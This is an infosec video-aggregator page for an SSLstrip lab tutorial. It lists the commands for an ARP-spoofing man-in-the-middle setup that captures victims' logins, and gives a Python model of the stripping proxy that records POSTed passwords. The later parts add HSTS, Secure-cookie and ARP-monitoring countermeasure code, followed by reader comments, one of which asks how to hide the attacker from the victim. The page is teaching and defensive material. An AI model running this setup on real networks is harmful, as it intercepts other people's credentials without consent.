Description: SSLstrip was released by Moxie Marlinspike to demonstrate the HTTPS-stripping attack he presented at Black Hat DC 2009. In this video we look at how to get started with SSLstrip. We set up two VMware machines, one running Windows XP (victim) and the other BackTrack 3 (attacker). Before we begin using SSLstrip, we need to put ourselves in a man-in-the-middle position and set up packet forwarding and redirection. We do this with the following commands, in sequence:
1. Enable IP forwarding, so that packets the victim sends us for the gateway are passed on instead of dropped:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP-poison the victim so that its gateway-bound traffic comes to us (with -t this poisons only the victim's cache; 192.168.1.6 is the victim, 192.168.1.1 the gateway):
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
3. Redirect the forwarded HTTP traffic (TCP port 80) to a local port with iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4. Start SSLstrip listening on port 10000 (the default; -l changes it) and writing captured data to the file "secret":
python sslstrip.py -w secret
Once this setup is up and running, all of the victim's outbound traffic passes through us. In particular, its HTTP traffic is redirected to our port 10000, where SSLstrip is listening. SSLstrip rewrites the HTTPS links in the pages it relays, so the victim's browser submits its logins over plain HTTP while SSLstrip itself talks HTTPS to the real site; we can then read every password the victim believes is being sent over "SSL". Note that a site reached directly over HTTPS (typed URL or bookmark) is not stripped; only links and redirects that pass through the proxy are. If you are interested in how the SSLstrip tool actually works, please view the entire presentation video here. You can download the SSLstrip tool here.
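To make the mechanism above concrete, here is an added example (illustrative code written for this page, not Moxie's sslstrip.py) that models what the proxy on port 10000 does: it rewrites https:// links in relayed pages to http://, remembers which hosts it stripped, fetches those hosts over HTTPS on the victim's behalf, and records the POST bodies the victim now sends in the clear, as the -w log file would. The host names and the sample login page are constructed.

```python
# Added example: a simplified model of what SSLstrip does to the traffic that
# iptables redirects to port 10000. Illustrative code written for this page,
# not the real sslstrip.py; host names and the sample page are constructed.
import re
from urllib.parse import urlsplit

HTTPS_LINK = re.compile(r'https://([^\s"\'<>]+)', re.IGNORECASE)


class StripProxy:
    """Sits between the victim's browser and the web, speaking plain HTTP to
    the victim and HTTPS to any site whose links it has already stripped."""

    def __init__(self, logfile=None):
        self.stripped = set()    # hosts the victim now believes are plain http
        self.captured = []       # (host, path, body) of POSTs to stripped hosts
        self.logfile = logfile   # like sslstrip's -w: where captured data goes

    def rewrite_response(self, body):
        """Rewrite every https:// link in a relayed page to http://, remembering
        the host so the follow-up request can be sent upstream over HTTPS."""
        def swap(match):
            rest = match.group(1)
            self.stripped.add(urlsplit("http://" + rest).netloc)
            return "http://" + rest
        return HTTPS_LINK.sub(swap, body)

    def upstream_url(self, host, path):
        """URL the proxy fetches for the victim: HTTPS for a stripped host (the
        real site sees an ordinary TLS client), plain HTTP otherwise."""
        scheme = "https" if host in self.stripped else "http"
        return scheme + "://" + host + path

    def handle_request(self, method, host, path, body=""):
        """Record POST bodies sent to stripped hosts (the victim's 'SSL' logins,
        now in the clear) and return the URL to fetch upstream."""
        if method == "POST" and host in self.stripped:
            self.captured.append((host, path, body))
            if self.logfile:
                with open(self.logfile, "a") as fh:
                    fh.write(f"{host}{path} {body}\n")
        return self.upstream_url(host, path)


# Constructed sample page, as the real site would serve it over HTTPS.
SAMPLE_PAGE = (
    '<html><body>'
    '<form action="https://mail.example.com/login" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
    '<a href="https://mail.example.com/help">Help</a>'
    '<img src="http://cdn.example.net/logo.png">'
    '</body></html>'
)


def demo():
    """Relay the sample page, then handle the login POST the victim sends."""
    proxy = StripProxy()
    page_seen_by_victim = proxy.rewrite_response(SAMPLE_PAGE)
    # The browser now submits the form to http://mail.example.com/login, so the
    # proxy sees the credentials before relaying them upstream over HTTPS.
    upstream = proxy.handle_request("POST", "mail.example.com", "/login",
                                    "user=alice&pass=hunter2")
    return page_seen_by_victim, upstream, list(proxy.captured)


if __name__ == "__main__":
    page, upstream, captured = demo()
    print(page)
    print("fetched upstream:", upstream)
    print("captured:", captured)
```

The point to notice is that nothing here breaks TLS: the real site still sees a correct HTTPS session, only it is between the proxy and the server, and the victim's browser never asked for HTTPS at all because the link it was handed said http://.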
Tags: tools
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Very good video, thank you.
Good video. Please mention countermeasures.
That's really cool, dude.
Great job
OK, I've got a question here.
When you use arpspoof (in a non-VM environment) in an actual live scenario, what happens is that the ARP table of the victim (WinXP) also shows the attacker's IP and MAC address, thereby exposing the attacker to the victim.
Any ways to circumvent this?
BTW, I work on network forensics.
Well, this is great, my friend. Good job. I just got my Sec+ and it's been a while, like 5 years, into security. But I have one question which might be very dumb!
That IP you used is a private one; I mean that is the IP the user gets after going through NAT. How can we figure that out? I know this might be an easy one, but I just don't know.
Thanks, this was awesome...
I am trying to use this together with a SLAAC attack instead of a regular ARP spoofing attack, but I can't get it to work. It's probably naptd messing things up. Any ideas?
Can you tell me the countermeasure for preventing this?
XP --> 192.168.1.6 (NAT)
Please help me out:
1) It has only one interface, which is NAT; then how will BackTrack be able to ping XP?
2) What should be the IP configuration for BackTrack?
Nice one. Played with sslstrip a little bit; it seems like my net banking has a solution for this. Good, and at the same time I'm curious how they solved it. Will investigate :)
The solution to this issue is very simple: make sure your login pages are using https. Keeping faith with the X.509 infrastructure which https uses (which may not be such a good idea), as long as https is being used, you're safe.
Thanks for the great video; I'm going to have lots of fun with ARP spoofing.
One countermeasure can be a static ARP table, with the default gateway pointing to the real, hard-coded MAC address:
arp -s 192.168.1.1 00-aa-11-bb-22-cc
Great video. Thanks.
Another countermeasure is either HSTS (Chrome or Firefox) or CSP (Firefox). It won't protect first-time users, but the vast majority of your traffic (and your most sensitive information) will be posted by returning visitors.
Additionally, some cookies can be set to ONLY send via SSL, so existing sessions won't be preserved over sslstrip. Users *might* suspect something's up when they get mysteriously logged out.
TC
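As an added illustration of the two browser-side defences in the comment above (example code written for this page, not a browser's implementation), the model below tracks an HSTS entry per host and the Secure flag on cookies. It shows the first-visit gap the comment mentions: before any HTTPS visit, an http:// link goes out in the clear; after a visit that set Strict-Transport-Security, the browser upgrades the stripped link to https:// before it ever hits the wire, and a session cookie flagged Secure is simply not sent over plain HTTP, which is why a stripped session looks logged out. Host names, headers and timestamps are constructed.

```python
# Added example: a model of HSTS (RFC 6797) and the Secure cookie flag as seen
# from the victim's browser. Illustrative code written for this page, not a
# browser's implementation; hosts, headers and timestamps are constructed.
import re

MAX_AGE = re.compile(r"max-age\s*=\s*(\d+)", re.IGNORECASE)


def parse_max_age(sts_header):
    """Return the max-age of a Strict-Transport-Security header, or None."""
    m = MAX_AGE.search(sts_header)
    return int(m.group(1)) if m else None


def parse_set_cookie(header):
    """Return (name, value, secure) for one Set-Cookie header value."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    secure = any(p.lower() == "secure" for p in parts[1:])
    return name.strip(), value.strip(), secure


class Browser:
    def __init__(self):
        self.hsts = {}      # host -> expiry time (seconds)
        self.cookies = {}   # host -> {name: (value, secure)}

    def receive(self, host, scheme, headers, now):
        """Process response headers. An HSTS header is only honoured when it
        arrived over HTTPS (RFC 6797 section 8.1), so a proxy on the HTTP side
        can neither plant an entry nor remove one the browser already holds."""
        if scheme == "https" and "Strict-Transport-Security" in headers:
            max_age = parse_max_age(headers["Strict-Transport-Security"])
            if max_age == 0:
                self.hsts.pop(host, None)
            elif max_age is not None:
                self.hsts[host] = now + max_age
        for sc in headers.get("Set-Cookie", []):
            name, value, secure = parse_set_cookie(sc)
            self.cookies.setdefault(host, {})[name] = (value, secure)

    def navigate(self, url, now):
        """Return the URL actually fetched: an http:// URL for a host with an
        unexpired HSTS entry is rewritten to https:// before leaving the browser,
        so a stripped link is never followed in the clear."""
        scheme, rest = url.split("://", 1)
        host = rest.split("/", 1)[0]
        expiry = self.hsts.get(host)
        if scheme == "http" and expiry is not None and now < expiry:
            return "https://" + rest
        return url

    def cookie_header(self, host, scheme):
        """Cookie header for a request to host; Secure cookies are withheld
        over plain http, so a stripped request carries no session."""
        sent = [f"{name}={value}"
                for name, (value, secure) in self.cookies.get(host, {}).items()
                if scheme == "https" or not secure]
        return "; ".join(sent)


def scenario():
    """First visit (unprotected), then a returning visit after HSTS was set."""
    b = Browser()
    first = b.navigate("http://bank.example/login", now=1000)      # stays http
    b.receive("bank.example", "https", {
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "Set-Cookie": ["sid=abc123; Secure; HttpOnly", "lang=en"],
    }, now=1000)
    returning = b.navigate("http://bank.example/login", now=2000)  # upgraded
    return first, returning, b.cookie_header("bank.example", "http")


if __name__ == "__main__":
    print(scenario())
```

Two caveats worth keeping in mind: the entry expires with max-age, so a long-idle user falls back into the first-visit gap, and the header must be seen on an HTTPS response at least once, which is exactly the visit sslstrip tries to prevent.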
Hi,
This is for those of you who were wondering if there was any countermeasure available.
Well yes, you can use tools like 'arpwatch' or 'arpon' that allow you to prevent ARP spoofing.
Arpwatch keeps a watch on your ARP table, and any changes found in it are recorded. You can provide settings with which you will be alerted whenever your ARP table gets modified.
Arpon goes one step further. It not only detects the change, it prevents it as well, thus automatically securing your machine from ARP spoofing.
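The arpwatch-style check described in the comment above, and the symptom noted earlier in the thread (the attacker's MAC appearing in the victim's ARP table against the gateway's IP), as an added example written for this page; it is not arpwatch or ArpON. It parses a Windows XP style 'arp -a' listing taken before and during the attack (both constructed to match the tutorial's 192.168.1.x lab, with 192.168.1.7 as the attacker) and raises two alerts: a pinned IP whose MAC changed, and one MAC claimed by more than one IP.

```python
# Added example: an arpwatch-like check over constructed 'arp -a' output from
# the Windows XP victim. Illustrative code written for this page, not arpwatch
# or ArpON; all addresses are made up to match the tutorial's lab.
import re

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)")

# Baseline recorded before the attack: the real gateway MAC, the value one
# would pin with 'arp -s 192.168.1.1 00-aa-11-bb-22-cc'.
BASELINE = {"192.168.1.1": "00-aa-11-bb-22-cc"}

BEFORE = """\
Interface: 192.168.1.6 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-aa-11-bb-22-cc     dynamic
  192.168.1.7           00-0c-29-12-34-56     dynamic
"""

# Same table while arpspoof runs on 192.168.1.7: the gateway entry now carries
# the attacker's MAC, which still appears against the attacker's own IP too.
DURING = """\
Interface: 192.168.1.6 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-12-34-56     dynamic
  192.168.1.7           00-0c-29-12-34-56     dynamic
"""


def parse_arp_table(text):
    """Map IP -> lowercase MAC from 'arp -a' output, skipping header lines."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def check_arp(table, baseline):
    """Return alerts: ('changed', ip, expected, seen) for a pinned IP whose MAC
    moved, and ('duplicate', mac, ips) for a MAC claimed by several IPs.
    Broadcast and IPv4 multicast entries are skipped; they are normal."""
    alerts = []
    for ip, mac in baseline.items():
        seen = table.get(ip)
        if seen is not None and seen != mac.lower():
            alerts.append(("changed", ip, mac.lower(), seen))
    by_mac = {}
    for ip, mac in table.items():
        if mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e"):
            continue
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(("duplicate", mac, tuple(sorted(ips))))
    return alerts


if __name__ == "__main__":
    print("before:", check_arp(parse_arp_table(BEFORE), BASELINE))
    print("during:", check_arp(parse_arp_table(DURING), BASELINE))
```

The duplicate-MAC rule is a heuristic: a router that answers for several addresses, or a host with several virtual IPs, will trigger it legitimately, so the gateway-MAC-changed rule against a known baseline is the one to page on.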
Great video, good job :)
Awesome video!!
Fragrouter -B1 is also a good option and does put the system into routing mode. The only advantage is that you can see which connections are being routed, in a verbose fashion.
Great tutorial. I have followed all your steps; when I get to the end, on the victim's PC, trying to log into Gmail, Yahoo, or any other SSL site, the browser will not open any of those pages in IE, FF or Chrome. When I stop the arpspoofing and refresh the page, it comes up then. I'm using Comcast for internet. Any thoughts will be greatly appreciated. Thanks
Great video Vivek,
I am also facing the same issue spse850 mentioned: on the victim's PC, trying to log into Gmail, Yahoo, or any other SSL site, the browser will not open any of those pages in IE, FF or Chrome; when I stop the arpspoofing and refresh the page, it comes up then.
Facing the same issues as hakpak.